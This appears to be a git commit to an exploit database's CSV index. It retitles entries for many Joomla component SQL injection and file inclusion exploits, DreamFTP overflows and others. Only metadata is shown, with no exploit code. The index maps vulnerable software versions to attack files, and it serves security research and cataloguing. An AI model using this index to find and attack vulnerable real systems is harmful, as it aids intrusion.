DB: 2016-11-08
7 new exploits BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String BolinTech DreamFTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Dream FTP Server 1.0.2 - (PORT) Remote Denial of Service BolinTech DreamFTP Server 1.0.2 - (PORT) Remote Denial of Service BolinTech DreamFTP - 'USER' Remote Buffer Overflow (PoC) BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC) Dream FTP Server 1.02 - (users.dat) Arbitrary File Disclosure BolinTech DreamFTP Server 1.02 - 'users.dat' Arbitrary File Disclosure Joomla! Component com_menu - SQL Injection Joomla! Component 'com_menu' - SQL Injection Joomla! Component com_jp_jobs - SQL Injection Joomla! Component 'com_jp_jobs' 1.4.1 - SQL Injection Joomla! Component redSHOP - Local File Inclusion Joomla! Component redTWITTER - Local File Inclusion Joomla! Component WISro Yahoo Quotes - Local File Inclusion Joomla! Component com_press - SQL Injection Joomla! Component Picasa 2.0 - Local File Inclusion Joomla! Component 'com_redshop' 1.0 - Local File Inclusion Joomla! Component 'com_redtwitter' 1.0 - Local File Inclusion Joomla! Component 'com_wisroyq' 1.1 - Local File Inclusion Joomla! Component 'com_press' - SQL Injection Joomla! Component 'com_joomlapicasa' 2.0 - Local File Inclusion Joomla! Component com_serie - SQL Injection Joomla! Component 'com_serie' - SQL Injection Joomla! Component com_ranking - SQL Injection Joomla! Component JInventory - Local File Inclusion Joomla! Component com_svmap 1.1.1 - Local File Inclusion Joomla! Component com_shoutbox - Local File Inclusion Joomla! Component com_loginbox - Local File Inclusion Joomla! Component com_bca-rss-syndicator - Local File Inclusion Joomla! Component Magic Updater (com_Joomlaupdater) - Local File Inclusion Joomla! Component 'com_ranking' - SQL Injection Joomla! Component 'com_jinventory' - Local File Inclusion Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion Joomla! Component 'com_shoutbox' - Local File Inclusion Joomla! Component 'com_loginbox' - Local File Inclusion Joomla! Component 'com_bca-rss-syndicator' - Local File Inclusion Joomla! Component 'com_Joomlaupdater' - Local File Inclusion Joomla! Component News Portal com_news - Local File Inclusion Joomla! Component FreeStyle FAQ Lite 1.3 com_fss (faqid) - SQL Injection Joomla! Component 'com_news_portal' 1.5.x - Local File Inclusion Joomla! Component 'com_fss' 1.3 - 'faqid' Parameter SQL Injection Joomla! Component Saber Cart com_sebercart - Local File Inclusion Joomla! Component J!WHMCS Integrator com_jwhmcs - Local File Inclusion Joomla! Component Juke Box com_jukebox - Local File Inclusion Joomla! Component Joomla! Flickr com_Joomlaflickr - Local File Inclusion Joomla! Component Highslide JS com_hsconfig - Local File Inclusion Joomla! Component Fabrik com_fabrik - Local File Inclusion Joomla! Component Affiliate Feeds com_datafeeds - Local File Inclusion Joomla! Component Appointment com_appointment - Local File Inclusion Joomla! Component 'com_sebercart' 1.0.0.12 - Local File Inclusion Joomla! Component 'com_jwhmcs' 1.5.0 - Local File Inclusion Joomla! Component 'com_jukebox' 1.7 - Local File Inclusion Joomla! Component 'com_Joomlaflickr' 1.0 - Local File Inclusion Joomla! Component 'com_hsconfig' 1.5 - Local File Inclusion Joomla! Component 'com_fabrik' 2.0 - Local File Inclusion Joomla! Component 'com_datafeeds' 880 - Local File Inclusion Joomla! Component 'com_appointment' 1.5 - Local File Inclusion Joomla! Component XOBBIX - prodid SQL Injection Joomla! Component 'com_xobbix' 1.0 - 'prodid' Parameter SQL Injection Joomla! Component aWiki com_awiki - Local File Inclusion Joomla! Component VJDEO com_vjdeo 1.0 - Local File Inclusion Joomla! Component 'com_awiki' - Local File Inclusion Joomla! Component 'com_vjdeo' 1.0 - Local File Inclusion Joomla! Component com_articles - SQL Injection Joomla! Component 'com_articles' - SQL Injection Joomla! Component Webee Comments - Local File Inclusion Joomla! Component Realtyna Translator - Local File Inclusion Joomla! Component AWDwall-Joomla! - (cbuser) Local File Inclusion / SQL Injection Joomla! Component 'com_webeecomment' 2.0 - Local File Inclusion Joomla! Component 'com_realtyna' 1.0.15 - Local File Inclusion Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection Joomla! Component PowerMail Pro com_powermail - Local File Inclusion Joomla! Component 'com_powermail' 1.5.3 - Local File Inclusion Joomla! Component Foobla Suggestions com_foobla - Local File Inclusion Joomla! Component JA Voice com_javoice - Local File Inclusion Joomla! Component 'com_foobla_suggestions' 1.5.1.2 - Local File Inclusion Joomla! Component 'com_javoice' - Local File Inclusion Joomla! Component com_pcchess - Local File Inclusion Joomla! Component huruhelpdesk - SQL Injection Joomla! Component 'com_pcchess' - Local File Inclusion Joomla! Component 'com_huruhelpdesk' - SQL Injection Joomla! Component com_agenda 1.0.1 - 'id' SQL Injection Joomla! Component 'com_agenda' 1.0.1 - 'id' Parameter SQL Injection Joomla! Component com_properties[aid] - SQL Injection Joomla! Component allvideos - Blind SQL Injection Joomla! Component com_Ca - SQL Injection Joomla! Component 'com_properties' - 'aid' Parameter SQL Injection Joomla! Component 'com_allvideos' - Blind SQL Injection Joomla! Component 'com_ca' - SQL Injection Joomla! Component TweetLA! - Local File Inclusion Joomla! Component Ticketbook - Local File Inclusion Joomla! Component JA Job Board - Multiple Local File Inclusion Joomla! Component Jfeedback! - Local File Inclusion Joomla! Component JProject Manager - Local File Inclusion Joomla! Component Preventive And Reservation - Local File Inclusion Joomla! Component RokModule - 'moduleid' Blind SQL Injection Joomla! Component spsNewsletter - Local File Inclusion Joomla! Component AlphaUserPoints - Local File Inclusion Joomla! Component TRAVELbook - Local File Inclusion Joomla! Component 'com_tweetla' - Local File Inclusion Joomla! Component 'com_ticketbook' - Local File Inclusion Joomla! Component 'com_jajobboard' - Multiple Local File Inclusion Joomla! Component 'com_jfeedback' - Local File Inclusion Joomla! Component 'com_jprojectmanager' - Local File Inclusion Joomla! Component 'com_preventive' - Local File Inclusion Joomla! Component 'com_rokmodule' - 'moduleid' Parameter Blind SQL Injection Joomla! Component 'com_spsnewsletter' - Local File Inclusion Joomla! Component 'com_alphauserpoints' 1.5.5 - Local File Inclusion Joomla! Component 'com_travelbook' 1.0.1 - Local File Inclusion Joomla! Component education - SQL Injection Joomla! Component 'com_education_classess' - SQL Injection Joomla! Component Multi-Venue Restaurant Menu Manager - SQL Injection Joomla! Component 'com_mv_restaurantmenumanager' 1.5.2 - SQL Injection Joomla! Component mv_restaurantmenumanager - SQL Injection Joomla! Component 'mv_restaurantmenumanager' - SQL Injection Joomla! Component Web TV com_webtv - Local File Inclusion Joomla! Component Horoscope com_horoscope - Local File Inclusion Joomla! Component Arcade Games com_arcadegames - Local File Inclusion Joomla! Component Flashgames com_Flashgames - Local File Inclusion Joomla! Component AddressBook com_AddressBook - Local File Inclusion Joomla! Component Easy Ad Banner com_advertising - Local File Inclusion Joomla! Component CV Maker com_cvmaker - Local File Inclusion Joomla! Component My Files com_myfiles - Local File Inclusion Joomla! Component Online Exam com_onlineexam - Local File Inclusion Joomla! Component JoomMail com_joommail - Local File Inclusion Joomla! Component Memory Book com_memory - Local File Inclusion Joomla! Component Online Market com_market - Local File Inclusion Joomla! Component Digital Diary com_diary - Local File Inclusion Joomla! Component 'com_webtv' - Local File Inclusion Joomla! Component 'com_horoscope' - Local File Inclusion Joomla! Component 'com_arcadegames' - Local File Inclusion Joomla! Component 'com_Flashgames' - Local File Inclusion Joomla! Component 'com_AddressBook' - Local File Inclusion Joomla! Component 'com_advertising' - Local File Inclusion Joomla! Component 'com_cvmaker' - Local File Inclusion Joomla! Component 'com_myfiles' - Local File Inclusion Joomla! Component 'com_onlineexam' - Local File Inclusion Joomla! Component 'com_joommail' - Local File Inclusion Joomla! Component 'com_memory' - Local File Inclusion Joomla! Component 'com_market' - Local File Inclusion Joomla! Component 'com_diary' - Local File Inclusion Joomla! Component com_worldrates - Local File Inclusion Joomla! Component com_record - Local File Inclusion Joomla! Component com_sweetykeeper - Local File Inclusion Joomla! Component com_jdrugstopics - SQL Injection Joomla! Component com_sermonspeaker - SQL Injection Joomla! Component com_flexicontent - Local File Joomla! Component 'com_worldrates' - Local File Inclusion Joomla! Component 'com_record' - Local File Inclusion Joomla! Component 'com_sweetykeeper' - Local File Inclusion Joomla! Component 'com_jdrugstopics' - SQL Injection Joomla! Component 'com_sermonspeaker' - SQL Injection Joomla! Component 'com_flexicontent' - Local File Joomla! Component Jvehicles - (aid) SQL Injection Joomla! Component com_jp_jobs 1.2.0 - 'id' SQL Injection Joomla! Component 'com_jvehicles' - 'aid' Parameter SQL Injection Joomla! Component 'com_jp_jobs' 1.2.0 - 'id' Parameter SQL Injection Joomla! Component com_QPersonel - SQL Injection Joomla! Component 'com_QPersonel' - SQL Injection Joomla! Component wgPicasa com_wgpicasa - Local File Inclusion Joomla! Component S5 Clan Roster com_s5clanroster - Local File Inclusion Joomla! Component Photo Battle com_photobattle - Local File Inclusion Joomla! Component MT Fire Eagle com_mtfireeagle - Local File Inclusion Joomla! Component Media Mall Factory com_mediamall - Blind SQL Injection Joomla! Component Love Factory com_lovefactory - Local File Inclusion Joomla! Component JA Comment com_jacomment - Local File Inclusion Joomla! Component Delicious BookMarks com_delicious - Local File Inclusion Joomla! Component Deluxe Blog Factory com_blogfactory - Local File Inclusion Joomla! Component BeeHeard Lite com_beeheard - Local File Inclusion Joomla! Component 'com_wgpicasa' - Local File Inclusion Joomla! Component 'com_s5clanroster' - Local File Inclusion Joomla! Component 'com_photobattle' - Local File Inclusion Joomla! Component 'com_mtfireeagle' - Local File Inclusion Joomla! Component 'com_mediamall' - Blind SQL Injection Joomla! Component 'com_lovefactory' - Local File Inclusion Joomla! Component 'com_jacomment' - Local File Inclusion Joomla! Component 'com_delicious' - Local File Inclusion Joomla! Component 'com_blogfactory' - Local File Inclusion Joomla! Component 'com_beeheard' - Local File Inclusion Joomla! Component com_iproperty 1.5.3 - 'id' SQL Injection Joomla! Component 'com_iproperty' 1.5.3 - 'id' Parameter SQL Injection Joomla! Component com_manager 1.5.3 - 'id' SQL Injection Joomla! Component 'com_manager' 1.5.3 - 'id' Parameter SQL Injection Joomla! Component com_joltcard - SQL Injection Joomla! Component com_pandafminigames - SQL Injection Joomla! Component 'com_joltcard' - SQL Injection Joomla! Component 'com_pandafminigames' - SQL Injection Joomla! Component Archery Scores (com_archeryscores) 1.0.6 - Local File Inclusion Joomla! Component ZiMB Comment com_zimbcomment - Local File Inclusion Joomla! Component ZiMB Manager com_zimbcore - Local File Inclusion Joomla! Component Gadget Factory com_gadgetfactory - Local File Inclusion Joomla! Component Matamko com_matamko - Local File Inclusion Joomla! Component Multiple Root com_multiroot - Local File Inclusion Joomla! Component Multiple Map com_multimap - Local File Inclusion Joomla! Component Contact Us Draw Root Map com_drawroot - Local File Inclusion Joomla! Component Contact Us Google Map com_google - Local File Inclusion Joomla! Component iF surfALERT com_if_surfalert - Local File Inclusion Joomla! Component 'com_archeryscores' 1.0.6 - Local File Inclusion Joomla! Component 'com_zimbcomment' - Local File Inclusion Joomla! Component 'com_zimbcore' - Local File Inclusion Joomla! Component 'com_gadgetfactory' - Local File Inclusion Joomla! Component 'com_matamko' - Local File Inclusion Joomla! Component 'com_multiroot' - Local File Inclusion Joomla! Component 'com_multimap' - Local File Inclusion Joomla! Component 'com_drawroot' - Local File Inclusion Joomla! Component 'com_google' - Local File Inclusion Joomla! Component 'com_if_surfalert' - Local File Inclusion Joomla! Component GBU FACEBOOK 1.0.5 - SQL Injection Joomla! Component 'com_gbufacebook' 1.0.5 - SQL Injection Joomla! Component com_jnewspaper - 'cid' SQL Injection Joomla! Component JTM Reseller 1.9 Beta - SQL Injection Joomla! Component 'com_jnewspaper' - 'cid' Parameter SQL Injection Joomla! Component 'com_jtm' 1.9 Beta - SQL Injection Joomla! Component wmi (com_wmi) - Local File Inclusion Joomla! Component OrgChart com_orgchart - Local File Inclusion Joomla! Component Mms Blog com_mmsblog - Local File Inclusion Joomla! Component 'com_wmi' - Local File Inclusion Joomla! Component 'com_orgchart' - Local File Inclusion Joomla! Component 'com_mmsblog' - Local File Inclusion Joomla! Component com_portfolio - Local File Disclosure Joomla! Component 'com_portfolio' - Local File Disclosure Joomla! Component com_caddy - Exploit Joomla! Component 'com_caddy' - Exploit Joomla! Component com_joomradio - SQL Injection Joomla! Component 'com_joomradio' - SQL Injection Joomla! Component Ultimate Portfolio com_ultimateportfolio - Local File Inclusion Joomla! Component NoticeBoard com_noticeboard - Local File Inclusion Joomla! Component SmartSite com_smartsite - Local File Inclusion Joomla! Extension ABC com_abc - SQL Injection Joomla! Component graphics (com_graphics) 1.0.6 - Local File Inclusion Joomla! Component 'com_ultimateportfolio' - Local File Inclusion Joomla! Component 'com_noticeboard' - Local File Inclusion Joomla! Component 'com_smartsite' - Local File Inclusion Joomla! Component 'com_abc' - SQL Injection Joomla! Component 'com_graphics' 1.0.6 - Local File Inclusion Joomla! Component JE Property Finder - Arbitrary File Upload Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload Joomla! Component Wap4Joomla! - 'wapmain.php' SQL Injection Joomla! Component 'Wap4Joomla' - 'wapmain.php' SQL Injection Joomla! Component com_newsfeeds - SQL Injection Joomla! Component 'com_newsfeeds' - SQL Injection Joomla! Component Table JX - Cross-Site Scripting Vulnerabilities Joomla! Component Card View JX - Cross-Site Scripting Joomla! Component 'Table JX' - Cross-Site Scripting Joomla! Component 'Card View JX' - Cross-Site Scripting Joomla! Extension DJ-Classifieds com_djClassifieds - Arbitrary File Upload Joomla! 'com_djClassifieds' 0.9.1 - Arbitrary File Upload Joomla! Component com_articleman - Arbitrary File Upload Joomla! Component 'com_articleman' - Arbitrary File Upload Joomla! Component Module Camp26 Visitor Data 1.1 - Remote code Execution Joomla! Component 'mod_VisitorData' 1.1 - Remote code Execution Joomla! Component Custom PHP Pages com_PHP - Local File Inclusion Joomla! Component 'com_PHP' 0.1 - Local File Inclusion Joomla! Component com_konsultasi - 'sid' SQL Injection Joomla! Component 'com_konsultasi' - 'sid' Parameter SQL Injection Joomla! Component Advertising (com_aardvertiser) 2.0 - Local File Inclusion Joomla! Component 'com_aardvertiser' 2.0 - Local File Inclusion Joomla! Component Seber Cart - 'getPic.php' Local File Disclosure Joomla! Component FDione Form Wizard - Local File Inclusion Joomla! Component 'com_sebercart' - 'getPic.php' Local File Disclosure Joomla! Component 'com_dioneformwizard' - Local File Inclusion Joomla! Component com_jejob JE Job 1.0 - Local File Inclusion Joomla! Component 'com_jejob' 1.0 - Local File Inclusion Joomla! Component com_jequoteform - Local File Inclusion Joomla! Component 'com_jequoteform' - Local File Inclusion Joomla! Component MS Comment 0.8.0b - Local File Inclusion Joomla! Component 'com_mscomment' 0.8.0b - Local File Inclusion Joomla! Component com_camp - SQL Injection Joomla! Component 'com_camp' - SQL Injection Joomla! Component simpledownload 0.9.5 - Local File Inclusion Joomla! Component 'com_simpledownload' 0.9.5 - Local File Inclusion Joomla! Component simpledownload 0.9.5 - Local File Disclosure Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure Joomla! Component com_crowdsource - SQL Injection Joomla! Component com_event - Multiple Vulnerabilities Joomla! Component 'com_crowdsource' - SQL Injection Joomla! Component 'com_event' - Multiple Vulnerabilities Joomla! Component com_event - SQL Injection Joomla! Component 'com_event' - SQL Injection Joomla! Component com_packages - SQL Injection Joomla! Component 'com_packages' - SQL Injection Joomla! Component com_qpersonel - SQL Injection Remote Exploit Joomla! Component 'com_qpersonel' 1.0 - SQL Injection BolinTech Dream FTP Server 1.02 - Format String (Metasploit) BolinTech DreamFTP Server 1.02 - Format String (Metasploit) PHP 5.4.3 (Windows x86) - Code Execution PHP 5.4.3 (Windows x86 Polish) - Code Execution Schoolhos CMS Beta 2.29 - (index.php id Parameter) SQL Injection Schoolhos CMS Beta 2.29 - 'id' Parameter SQL Injection BolinTech Dream FTP Server 1.0 - User Name Format String (1) BolinTech DreamFTP Server 1.0 - User Name Format String (1) Joomla! Component JoomlaTune JComments 2.1 - 'ComntrNam' Parameter Cross-Site Scripting Joomla! Component 'com_jcomments' 2.1 - 'ComntrNam' Parameter Cross-Site Scripting Joomla! Component Percha Image Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component Percha Fields Attach 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchaimageattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchafieldsattach' 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component Percha Multicategory Article 0.6 - 'index.php' Controller Parameter Arbitrary File Access Joomla! Component 'com_perchacategoriestree' 0.6 - 'Controller' Parameter Arbitrary File Access Joomla! Component com_horses - 'id' Parameter SQL Injection Joomla! Component 'com_horses' - 'id' Parameter SQL Injection FreePBX 10.13.66 - Remote Command Execution / Privilege Escalation FreePBX 13 - Remote Command Execution / Privilege Escalation BolinTech DreamFTP 1.02 - 'RETR' Command Remote Buffer Overflow BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow Schoolhos CMS 2.29 - 'kelas' Parameter SQL Injection Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080 / MS14-084) Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read NodCMS - PHP Code Execution Piwik 2.16.0 - 'layout' PHP Object Injection Sophos Web Appliance 4.2.1.3 - Remote Code Execution
This commit is contained in:
parent
b80848bd60
commit
1e08cb156e
9 changed files with 976 additions and 154 deletions
313
files.csv
313
files.csv
|
@ -645,7 +645,7 @@ id,file,description,date,author,platform,type,port
|
|||
819,platforms/windows/remote/819.py,"Savant Web Server 3.1 (French Windows OS support) - Remote Buffer Overflow",2005-02-15,"Jerome Athias",windows,remote,80
|
||||
820,platforms/php/webapps/820.php,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0
|
||||
822,platforms/windows/remote/822.c,"RhinoSoft Serv-U FTPd Server 4.x - 'site chmod' Remote Buffer Overflow",2004-01-30,Skylined,windows,remote,21
|
||||
823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String",2004-02-11,Skylined,windows,remote,21
|
||||
823,platforms/windows/remote/823.c,"BolinTech DreamFTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String",2004-02-11,Skylined,windows,remote,21
|
||||
824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid)",2005-09-13,Qnix,linux,local,0
|
||||
825,platforms/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow",2005-02-17,c0d3r,windows,remote,21
|
||||
826,platforms/linux/remote/826.c,"Medal of Honor Spearhead (Linux) - Server Remote Buffer Overflow",2005-02-18,millhouse,linux,remote,12203
|
||||
|
@ -2649,7 +2649,7 @@ id,file,description,date,author,platform,type,port
|
|||
2969,platforms/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - (htm2PHP.php) File Disclosure",2006-12-21,"the master",php,webapps,0
|
||||
2970,platforms/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - (mapage.php) Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps,0
|
||||
2971,platforms/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0
|
||||
2972,platforms/windows/dos/2972.c,"Dream FTP Server 1.0.2 - (PORT) Remote Denial of Service",2006-12-21,InTeL,windows,dos,0
|
||||
2972,platforms/windows/dos/2972.c,"BolinTech DreamFTP Server 1.0.2 - (PORT) Remote Denial of Service",2006-12-21,InTeL,windows,dos,0
|
||||
2973,platforms/php/webapps/2973.txt,"PowerClan 1.14a - (footer.inc.php) Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0
|
||||
2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote,0
|
||||
2975,platforms/php/webapps/2975.pl,"Ixprim CMS 1.2 - Blind SQL Injection",2006-12-21,DarkFig,php,webapps,0
|
||||
|
@ -2805,7 +2805,7 @@ id,file,description,date,author,platform,type,port
|
|||
3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps,0
|
||||
3126,platforms/windows/dos/3126.c,"WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service",2007-01-14,Marsu,windows,dos,0
|
||||
3127,platforms/windows/dos/3127.c,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
|
||||
3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP - 'USER' Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
|
||||
3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
|
||||
3130,platforms/osx/dos/3130.c,"Apple Mac OSX 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow (PoC)",2007-01-14,MoAB,osx,dos,0
|
||||
3131,platforms/windows/local/3131.c,"Kaspersky AntiVirus 6.0 - Privilege Escalation",2007-01-15,MaD,windows,local,0
|
||||
3132,platforms/windows/remote/3132.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)",2007-01-15,"Jacopo Cervini",windows,remote,69
|
||||
|
@ -8038,7 +8038,7 @@ id,file,description,date,author,platform,type,port
|
|||
8522,platforms/windows/dos/8522.pl,"Zervit Web Server 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0
|
||||
8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard - Remote Denial of Service (PoC)",2009-04-23,shinnai,windows,dos,0
|
||||
8524,platforms/windows/dos/8524.txt,"Home Web Server r1.7.1 (build 147) - Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0
|
||||
8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 - (users.dat) Arbitrary File Disclosure",2009-04-23,Cyber-Zone,windows,remote,0
|
||||
8525,platforms/windows/remote/8525.pl,"BolinTech DreamFTP Server 1.02 - 'users.dat' Arbitrary File Disclosure",2009-04-23,Cyber-Zone,windows,remote,0
|
||||
8526,platforms/windows/dos/8526.py,"Popcorn 1.87 - Remote Heap Overflow (PoC)",2009-04-23,x.CJP.x,windows,dos,0
|
||||
8527,platforms/windows/local/8527.py,"CoolPlayer Portable 2.19.1 - (Skin) Buffer Overflow",2009-04-23,Stack,windows,local,0
|
||||
8529,platforms/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling",2009-04-24,ZoRLu,asp,webapps,0
|
||||
|
@ -10979,7 +10979,7 @@ id,file,description,date,author,platform,type,port
|
|||
12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0
|
||||
12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 - OOB Array Indexing",2010-04-02,"Tobias Klein",windows,dos,0
|
||||
12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - Exploit (2)",2010-04-02,"Richard leahy",windows,local,0
|
||||
12015,platforms/php/webapps/12015.txt,"Joomla! Component com_menu - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
|
||||
12015,platforms/php/webapps/12015.txt,"Joomla! Component 'com_menu' - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
|
||||
12016,platforms/php/webapps/12016.txt,"Joomla! Component com_ops - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
|
||||
12017,platforms/php/webapps/12017.txt,"Joomla! Component com_football - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
|
||||
12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0
|
||||
|
@ -10999,7 +10999,7 @@ id,file,description,date,author,platform,type,port
|
|||
12034,platforms/php/webapps/12034.txt,"Flatpress 0.909.1 - Persistent Cross-Site Scripting",2010-04-03,ITSecTeam,php,webapps,0
|
||||
12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - SEH Exploit",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0
|
||||
12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2010-04-03,l3D,hardware,webapps,0
|
||||
12037,platforms/php/webapps/12037.txt,"Joomla! Component com_jp_jobs - SQL Injection",2010-04-03,Valentin,php,webapps,0
|
||||
12037,platforms/php/webapps/12037.txt,"Joomla! Component 'com_jp_jobs' 1.4.1 - SQL Injection",2010-04-03,Valentin,php,webapps,0
|
||||
12038,platforms/php/webapps/12038.txt,"Advanced Management For Services Sites - Bypass Create And Download SQL Backup",2010-04-04,indoushka,php,webapps,0
|
||||
12039,platforms/multiple/webapps/12039.txt,"QuickEStore 6.1 - Backup Dump",2010-04-04,indoushka,multiple,webapps,0
|
||||
12041,platforms/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",php,webapps,0
|
||||
|
@ -11014,40 +11014,40 @@ id,file,description,date,author,platform,type,port
|
|||
12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow",2010-04-04,"Yakir Wizman",windows,local,0
|
||||
12052,platforms/php/webapps/12052.txt,"SAGU-PRO 1.0 - Multiple Remote File Inclusion",2010-04-04,mat,php,webapps,0
|
||||
12053,platforms/windows/local/12053.py,"ZipCentral - '.zip' SEH Exploit",2010-04-04,TecR0c,windows,local,0
|
||||
12054,platforms/php/webapps/12054.txt,"Joomla! Component redSHOP - Local File Inclusion",2010-04-04,NoGe,php,webapps,0
|
||||
12055,platforms/php/webapps/12055.txt,"Joomla! Component redTWITTER - Local File Inclusion",2010-04-04,NoGe,php,webapps,0
|
||||
12056,platforms/php/webapps/12056.txt,"Joomla! Component WISro Yahoo Quotes - Local File Inclusion",2010-04-04,NoGe,php,webapps,0
|
||||
12057,platforms/php/webapps/12057.txt,"Joomla! Component com_press - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
|
||||
12058,platforms/php/webapps/12058.txt,"Joomla! Component Picasa 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps,0
|
||||
12054,platforms/php/webapps/12054.txt,"Joomla! Component 'com_redshop' 1.0 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0
|
||||
12055,platforms/php/webapps/12055.txt,"Joomla! Component 'com_redtwitter' 1.0 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0
|
||||
12056,platforms/php/webapps/12056.txt,"Joomla! Component 'com_wisroyq' 1.1 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0
|
||||
12057,platforms/php/webapps/12057.txt,"Joomla! Component 'com_press' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
|
||||
12058,platforms/php/webapps/12058.txt,"Joomla! Component 'com_joomlapicasa' 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps,0
|
||||
12059,platforms/windows/local/12059.pl,"eZip Wizard 3.0 - '.zip' SEH Exploit",2010-04-04,"Lincoln and corelanc0d3r",windows,local,0
|
||||
12060,platforms/php/webapps/12060.txt,"Joomla! Component com_serie - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
|
||||
12060,platforms/php/webapps/12060.txt,"Joomla! Component 'com_serie' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
|
||||
12061,platforms/php/webapps/12061.txt,"Facil-CMS - (Local File Inclusion / Remote File Inclusion)",2010-04-04,eidelweiss,php,webapps,0
|
||||
12062,platforms/php/webapps/12062.txt,"Joomla! Component com_ranking - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
|
||||
12065,platforms/php/webapps/12065.txt,"Joomla! Component JInventory - Local File Inclusion",2010-04-05,"Chip d3 bi0s",php,webapps,0
|
||||
12066,platforms/php/webapps/12066.txt,"Joomla! Component com_svmap 1.1.1 - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12067,platforms/php/webapps/12067.txt,"Joomla! Component com_shoutbox - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12068,platforms/php/webapps/12068.txt,"Joomla! Component com_loginbox - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12069,platforms/php/webapps/12069.txt,"Joomla! Component com_bca-rss-syndicator - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12070,platforms/php/webapps/12070.txt,"Joomla! Component Magic Updater (com_Joomlaupdater) - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12062,platforms/php/webapps/12062.txt,"Joomla! Component 'com_ranking' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0
|
||||
12065,platforms/php/webapps/12065.txt,"Joomla! Component 'com_jinventory' - Local File Inclusion",2010-04-05,"Chip d3 bi0s",php,webapps,0
|
||||
12066,platforms/php/webapps/12066.txt,"Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
12067,platforms/php/webapps/12067.txt,"Joomla! Component 'com_shoutbox' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0
|
||||
